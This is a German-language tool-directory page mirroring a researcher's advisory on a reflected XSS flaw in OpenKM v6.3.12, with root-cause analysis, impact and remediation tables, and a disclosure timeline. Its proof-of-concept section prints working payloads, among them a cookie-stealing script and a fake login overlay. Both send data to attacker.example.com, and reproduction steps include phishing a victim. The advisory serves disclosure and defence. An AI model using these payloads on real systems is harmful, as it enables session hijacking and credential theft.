Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS — Dokumentation und Proof-of-Concept für CVE-2026-30502, eine reflektierte XSS-Sicherheitslücke in OpenKM v6.3.12. Enthält technische Analyse, Grundursache, Auswirkungsbewertung und Anleitungen zur Behebung für Sicherheitsforscher und Penetrationstester. | Kitploit
Tools/GitHubGitHub/dharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss
Phishing-ToolsSchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsPapers & ForschungLernen & Bildung
GitHubdharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss

CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS

Dokumentation und Proof-of-Concept für CVE-2026-30502, eine reflektierte XSS-Sicherheitslücke in OpenKM v6.3.12. Enthält technische Analyse, Grundursache, Auswirkungsbewertung und Anleitungen zur Behebung für Sicherheitsforscher und Penetrationstester.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 2 MonatenNoch nicht geprüft

🛡️ CVE-2026-30502 — Reflektiertes XSS in OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Entdeckt und gemeldet von Dharmendra Kumar — Sicherheitsforscher

Cybersicherheit | Penetrationstests | Schwachstellenforschung | Verantwortungsvolle Offenlegung


📌 Inhaltsverzeichnis

  • Überblick
  • CVE-Details
  • Betroffenes Produkt
  • Schwachstellenbeschreibung
  • Ursachenanalyse
  • Auswirkungen & Risikobewertung
  • Proof of Concept (PoC)
  • Behebung & Empfehlungen
  • Offenlegungszeitplan
  • Referenzen
  • Über den Forscher

🔍 Überblick

Dieses Repository dokumentiert die verantwortungsvolle Offenlegung von CVE-2026-30502, einer Reflected Cross-Site Scripting (XSS)-Schwachstelle, die in OpenKM v6.3.12 identifiziert wurde – einem weit verbreiteten Open-Source-Dokumentenmanagementsystem, das in Unternehmens- und Regierungsumgebungen eingesetzt wird.

Die Schwachstelle besteht im Parameter Content, der vom Benutzer bereitgestellte Eingaben ohne ordnungsgemäße Bereinigung oder Ausgabekodierung an den Browser zurückspiegelt. Ein Angreifer kann eine bösartige URL mit eingebettetem JavaScript erstellen und ein Opfer durch Social Engineering dazu bringen, darauf zu klicken, was zur Ausführung des Skripts in der Browsersitzung des Opfers führt.

⚠️ Schweregrad: Mittel–Hoch | Angriffsvektor: Netzwerk | Erforderliche Berechtigungen: Keine | Benutzerinteraktion: Erforderlich


📋 CVE-Details


📦 Betroffenes Produkt

OpenKM ist ein freies und quelloffenes Dokumentenmanagementsystem (DMS), das eine Weboberfläche für die Verwaltung, Prüfung und Verteilung von Geschäftsdokumenten bietet. Es wird weltweit von Unternehmen, Regierungsbehörden und Bildungseinrichtungen eingesetzt.

  • Produktname: OpenKM Dokumentenmanagementsystem
  • Betroffene Version: v6.3.12
  • Hersteller-Website: https://www.openkm.com
  • Kategorie: Dokumentenmanagementsystem (DMS)
  • Sprache / Stack: Java (JSP / Spring Framework)

🧨 Schwachstellenbeschreibung

Eine Reflected Cross-Site Scripting (XSS)-Schwachstelle wurde in OpenKM v6.3.12 über den Parameter Content identifiziert. Die Anwendung validiert oder kodiert keine vom Benutzer bereitgestellten Eingaben, bevor sie im HTTP-Antwortkörper zurückgespiegelt werden, sodass beliebiges JavaScript eingeschleust und im Browser des Opfers ausgeführt werden kann.

Im Gegensatz zu Stored XSS wird ein Reflected-XSS-Payload nicht in der Datenbank gespeichert – er befindet sich stattdessen in einer manipulierten URL. Der Angriff beruht darauf, dass das Opfer dazu verleitet wird, auf einen bösartigen Link zu klicken (per E-Mail, Social Media oder Phishing-Kampagnen zugestellt). Anschließend wird der Payload still im Browser mit dem Sitzungskontext des Opfers ausgeführt.

Angriffsablauf

root@kitploit:~
Angreifer erstellt bösartige URL
        │
        ▼
Opfer klickt auf den Link (Phishing / Social Engineering)
        │
        ▼
Browser sendet GET/POST-Anfrage mit Payload im Parameter `Content`
        │
        ▼
OpenKM spiegelt die unsaubere Eingabe direkt in die HTML-Antwort zurück
        │
        ▼
Browser parst und führt das injizierte JavaScript aus
        │
        ▼
Sitzung gekapert / Anmeldedaten gestohlen / Konto kompromittiert

🔬 Ursachenanalyse

Die Schwachstelle resultiert aus dem Versagen der Anwendung, Eingabe-/Ausgabe-Sicherheitskontrollen für den Parameter Content durchzusetzen:

root@kitploit:~
Benutzererstellte URL ──► Content-Parameter ──► [KEINE Validierung]
       ──► In HTML-Antwort zurückgespiegelt ──► [KEINE Kodierung]
              ──► Browser führt Skript aus ──► Konto kompromittiert

💥 Auswirkungen & Risikobewertung

Eine erfolgreiche Ausnutzung dieser Schwachstelle kann zu Folgendem führen:


🧪 Proof of Concept (PoC)

⚠️ Haftungsausschluss: Die folgenden Informationen werden ausschließlich zu Bildungs- und Sicherheitsforschungszwecken im Rahmen der Grundsätze verantwortungsvoller Offenlegung geteilt. Testen oder verwenden Sie dies nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Genehmigung zur Bewertung haben.

Payload-Beispiele (Allgemein)

root@kitploit:~
// Basic execution proof
<script>alert('CVE-2026-30502 - XSS by Dharmendra Kumar')</script>

// Session cookie exfiltration
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

// Credential phishing overlay
<script>
  var d=document.createElement('div');
  d.innerHTML='<form action="https://attacker.example.com/log" method="POST">'
    +'<input name="u" placeholder="Username"/>'
    +'<input name="p" type="password" placeholder="Password"/>'
    +'<button>Sign In</button></form>';
  document.body.prepend(d);
</script>

Manipulierte bösartige URL-Struktur

root@kitploit:~
https://target-openkm-instance/[verwundbarer-Endpunkt]?Content=<script>alert(1)</script>

Schritte zur Reproduktion

  1. Identifizieren Sie den verwundbaren Endpunkt in OpenKM v6.3.12, der den Parameter Content zurückspiegelt
  2. Erstellen Sie eine URL mit einem an den Parameter Content angehängten XSS-Payload
  3. Kodieren Sie den Payload bei Bedarf URL-kodiert
  4. Senden Sie den manipulierten Link über E-Mail, Chat oder einen anderen Social-Engineering-Vektor an ein Opfer
  5. Wenn das Opfer den Link in seiner authentifizierten Browsersitzung öffnet, wird der Payload ausgeführt
  6. Beobachten Sie JavaScript-Ausführung, Cookie-Diebstahl oder Umleitungsverhalten

🛠️ Behebung & Empfehlungen

Für Entwickler / Hersteller

Für Systemadministratoren

  • 🔒 Beschränken Sie den OpenKM-Zugriff über Firewall-Regeln auf interne/vertrauenswürdige Netzwerke
  • 🛡️ Setzen Sie eine Web Application Firewall (WAF) mit XSS-Erkennungssignaturen als kompensierende Kontrolle ein
  • 📊 Überwachen Sie Webserver-Zugriffsprotokolle auf unerwartete Skript-Tags oder kodierte Payloads in Abfragezeichenfolgen
  • 🔄 Halten Sie die OpenKM-Installation auf dem neuesten sicheren Release
  • 📧 Schulen Sie Benutzer, bei unaufgeforderten Links zum DMS Vorsicht walten zu lassen

📅 Offenlegungszeitplan

Während dieses Prozesses wurden die Grundsätze der vollständigen verantwortungsvollen Offenlegung befolgt, einschließlich der Koordination mit dem Hersteller und der Beteiligung des CVE-Programms vor jeder öffentlichen Veröffentlichung.


📚 Referenzen

  • 🔗 MITRE CVE-Eintrag — CVE-2026-30502
  • 🔗 NVD — National Vulnerability Database
  • 🔗 OpenKM Offizielle Website
  • 🔗 OWASP XSS-Präventions-Spickzettel
  • 🔗 CWE-79: Cross-site Scripting
  • 🔗 OWASP Top 10 — A03:2021 Injection
  • 🔗 OWASP Java Encoder

👨‍💻 Über den Forscher

Dharmendra Kumar

Sicherheitsforscher | Penetrationstester | Bug Hunter | CVE-Mitarbeiter

Dharmendra Kumar ist ein unabhängiger Cybersicherheitsforscher, der sich auf Websicherheit, Penetrationstests und verantwortungsvolle Schwachstellenoffenlegung spezialisiert hat. Seine Forschung konzentriert sich auf die Identifizierung und verantwortungsvolle Meldung realer Sicherheitslücken in weit verbreiteter Software – und trägt so zu sichereren Anwendungen für Benutzer weltweit bei.

Fachgebiete:

  • 🌐 Webanwendungs-Penetrationstests
  • 🐛 Bug-Bounty-Jagd & CVE-Forschung
  • 🔍 Schwachstellenentdeckung & Sicherheitshinweise
  • 📋 Verantwortungsvolle Offenlegung & koordinierte CVE-Berichterstattung

Vernetzen Sie sich mit mir:

GitHub LinkedIn Twitter Instagram Medium


⚖️ Rechtlicher Haftungsausschluss

Dieses Repository ist ausschließlich für Bildungs- und Informationszwecke bestimmt. Die Schwachstellendetails und Proof-of-Concept-Payloads werden gemäß den Grundsätzen der verantwortungsvollen Offenlegung veröffentlicht. Der Autor befürwortet keine unbefugte Nutzung dieser Informationen und übernimmt keine Verantwortung dafür. Holen Sie vor der Durchführung von Sicherheitstests an einem System, das Ihnen nicht gehört, immer die ausdrückliche schriftliche Genehmigung ein.


🙏 Danksagungen

Besonderer Dank gilt:

  • Dem OpenKM-Entwicklungsteam für ihre Kooperation und Reaktionsbereitschaft während der koordinierten Offenlegung
  • Dem MITRE CVE-Programm für die Zuweisung und Verwaltung der CVE-Kennung
  • Der globalen Sicherheitsforschungs- und Bug-Bounty-Community, die die Messlatte für Anwendungssicherheit kontinuierlich höher legt

⭐ Wenn Ihnen diese Forschung geholfen hat, erwägen Sie bitte, dieses Repository zu markieren.

Sicherheitsforschung offen geteilt, um das Web für alle sicherer zu machen.

© 2026 Dharmendra Kumar — Alle Rechte vorbehalten

Tool herunterladen
FeldEinzelheiten
CVE-IDCVE-2026-30502
ProduktOpenKM
Betroffene Versionv6.3.12
SchwachstellenklasseReflektiertes Cross-Site Scripting (XSS)
Angreifbarer ParameterContent
CWECWE-79: Unzureichende Neutralisierung von Eingaben während der Generierung von Webseiten
CVSS-VektorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
SchweregradMittel–Hoch
HerausgeberMITRE CVE-Programm
ForscherDharmendra Kumar
Art der OffenlegungVerantwortungsvoll / Koordiniert
SchwächeBeschreibung
❌ Keine EingabevalidierungDer Parameter Content akzeptiert rohe HTML/JavaScript-Zeichen ohne Einschränkung oder Filterung
❌ Keine AusgabekodierungZurückgespiegelte Werte werden ohne HTML-Entity-Kodierung in die HTML-Antwort geschrieben
❌ Fehlender CSP-HeaderEs ist keine Content Security Policy erzwungen, um die Ausführung von Inline-Skripten zu blockieren
❌ Keine HTTPOnly-CookiesSitzungstoken sind über JavaScript zugänglich, was direkten Cookie-Diebstahl ermöglicht
RisikoBeschreibung
🍪 SitzungsdiebstahlStehlen aktiver Sitzungstoken über document.cookie, um das Opfer zu impersonieren
🔑 Anmeldedaten-DiebstahlEinblenden gefälschter Login-Overlays zum Erfassen von Klartext-Benutzernamen und -Passwörtern
📤 InformationsoffenlegungExfiltrieren sensibler Dokumentinhalte, Benutzerdaten oder interner Konfigurationen
🎣 Phishing-AngriffeDarstellen überzeugender gefälschter Seiten, die innerhalb der vertrauenswürdigen OpenKM-Domain gehostet werden
👤 KontoübernahmeAusführen beliebiger authentifizierter Aktionen im Namen des Opfers
⚙️ Unbefugte AktionenÄndern, Löschen oder Exfiltrieren von Dokumenten im DMS
🖥️ Malware-VerbreitungUmleiten von Opfern auf Angreifer-kontrollierte Websites mit bösartigen Downloads
EmpfehlungUmsetzung
✅ EingabevalidierungHTML-Sonderzeichen (<, >, ", ', ;) in allen benutzergesteuerten Parametern ablehnen oder entfernen
✅ AusgabekodierungKontextbewusste HTML-Kodierung mit Bibliotheken wie OWASP Java Encoder anwenden, bevor zurückgespiegelte Daten gerendert werden
✅ Content Security PolicyEinen strengen CSP-Header bereitstellen: Content-Security-Policy: default-src 'self'; script-src 'self'
✅ HTTPOnly-CookiesSetzen Sie die Flags HttpOnly und Secure auf allen Sitzungs-Cookies, um JavaScript-Zugriff zu blockieren
✅ SicherheitsbibliothekenIntegrieren Sie OWASP AntiSamy oder DOMPurify für eine robuste Bereinigung
✅ UpgradeWenden Sie umgehend den neuesten vom Hersteller veröffentlichten Sicherheitspatch an
DatumEreignis
🔍 EntdeckungSchwachstelle während der Sicherheitsbewertung von OpenKM v6.3.12 identifiziert
📧 Benachrichtigung des HerstellersVerantwortungsvoller Offenlegungsbericht an das OpenKM-Sicherheitsteam übermittelt
🤝 Bestätigung des HerstellersDas OpenKM-Team hat den Schwachstellenbericht bestätigt
📝 CVE-ZuweisungCVE-2026-30502 durch das MITRE CVE-Programm zugewiesen
🌐 Öffentliche OffenlegungKoordinierte öffentliche Offenlegung nach dem Behebungszeitraum